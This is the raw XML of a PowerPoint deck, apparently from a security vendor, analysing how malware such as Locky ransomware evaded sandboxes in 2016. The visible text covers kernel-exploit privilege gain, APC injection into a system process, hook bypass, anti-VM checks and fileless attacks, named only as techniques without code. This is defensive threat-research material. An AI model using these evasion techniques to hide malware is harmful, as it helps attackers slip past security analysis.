            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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028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007"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="71007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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Anti-Sandbox with kernel exploit	2/4 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>---TROJ_LOCKY.DLDRA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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607375"/>
            <a:ext cx="6408712" cy="4646969"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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107504" y="843558"/>
            <a:ext cx="8366760" cy="3816424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Gain kernel privilege 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execution </a:t>
            </a:r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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Queue APC to inject </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>      system process in kernel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to bypass Sandbox Hook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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Covert downloader 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in coat of system process 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zh-TW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419816" y="2391730"/>
            <a:ext cx="2640015" cy="111612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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940153" y="2859782"/>
            <a:ext cx="1656183" cy="162018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00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315"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="743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1892</TotalTime>
  <Words>1515</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(16:9)</PresentationFormat>
  <Paragraphs>372</Paragraphs>
  <Slides>44</Slides>
  <Notes>33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45" baseType="lpstr">
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>Sandbox evasion Emerging to noteworthy in 2016</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Shamoon APT Evasion in 2016</vt:lpstr>
      <vt:lpstr>What is evasion as we define in practice</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Noteworthy Evasions in 2016</vt:lpstr>
      <vt:lpstr>Locky Ransomware Evasion Evolution in 2016</vt:lpstr>
      <vt:lpstr>TROJ_LOCKY.DLDRA Locky   1/4</vt:lpstr>
      <vt:lpstr>Anti-Sandbox with kernel exploit 2/4  ---TROJ_LOCKY.DLDRA Locky </vt:lpstr>
      <vt:lpstr>Anti-Hook with Switch32to64  3/4 ---TROJ_LOCKY.DLDRA Locky </vt:lpstr>
      <vt:lpstr>Anti-Hook with Switch32to64  4/4 ---TROJ_LOCKY.DLDRA Locky </vt:lpstr>
      <vt:lpstr>Anti-VM &amp; Environment check 1/2 ---Ransomware-Locky!enc</vt:lpstr>
      <vt:lpstr>Anti-VM &amp; Environment check 2/2 ---Ransomware-Locky!enc</vt:lpstr>
      <vt:lpstr>Mac Ransomware Evasion</vt:lpstr>
      <vt:lpstr>Fileless Attack</vt:lpstr>
      <vt:lpstr>Fileless Attack - Brief summary </vt:lpstr>
      <vt:lpstr>Fileless Attack in Duqu2 like</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Internal Benchmark Data   1/3</vt:lpstr>
      <vt:lpstr>Executive Summary</vt:lpstr>
      <vt:lpstr>Thank You</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Evasion Test Framework Collection</vt:lpstr>
      <vt:lpstr>Generic Sandbox evasion algorithm  from academic–SandPrint 1/2</vt:lpstr>
      <vt:lpstr>Generic Sandbox evasion algorithm  from academic–SandPrint 1/2</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Evasion Overview</vt:lpstr>
      <vt:lpstr>Evasion Overview – PE evasion 1/4</vt:lpstr>
      <vt:lpstr>Evasion Overview – PE evasion 2/4</vt:lpstr>
      <vt:lpstr>Evasion Overview – PE evasion 3/4</vt:lpstr>
      <vt:lpstr>Evasion Overview – PE evasion 4/4</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Script Evasion</vt:lpstr>
      <vt:lpstr>Social Engineering – Office script</vt:lpstr>
      <vt:lpstr>Social Engineering – Office script Lure tricks</vt:lpstr>
      <vt:lpstr>Social Engineering – Office script example</vt:lpstr>
      <vt:lpstr>Evade sandbox – Script evasion </vt:lpstr>
      <vt:lpstr>Evade sandbox – Script evasion Sample 1/3</vt:lpstr>
      <vt:lpstr>Evade sandbox – Script evasion Sample 2/3</vt:lpstr>
      <vt:lpstr>Evade sandbox – Script evasion Sample 3/3</vt:lpstr>
      <vt:lpstr>Anti-evasion for Sandcastle</vt:lpstr>
      <vt:lpstr>Noteworthy Evasions in 2016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Darren Cheng (ADM-TW)</dc:creator>
  <cp:lastModifiedBy>Windows 用户</cp:lastModifiedBy>
  <cp:revision>193</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-22T02:28:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-05T02:26:47Z</dcterms:modified>
</cp:coreProperties>
</file>